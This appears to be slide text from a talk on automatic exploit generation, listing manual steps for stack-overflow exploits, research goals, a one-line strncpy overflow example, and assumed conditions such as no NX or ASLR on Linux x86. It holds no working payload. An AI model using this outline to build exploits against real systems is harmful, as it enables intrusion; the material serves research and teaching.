4. >_ Introduction
● Manual Exploit Generation
○ Locate the address where is overflow
○ Locate the return address
○ Construct the shellcode
● Automatic Exploit Generation
○ Automatically find vulnerabilities
○ Detect exploitable bugs
○ Generate exploits
5. >_ Introduction
● Challenges
○ Source code analysis alone is inadequate
■ char src[12], dst[10]; strncpy(dst, src, sizeof(src))
○ Infinite number of possible paths
■ Which paths should we check first?
7. >_ Overview
● Condition
○ Stack overflow or format string
○ Overwrite the return address to hijack the workflow
○ Not against common security defenses e.g. NX, ASLR
○ Source code is needed
○ Linux x86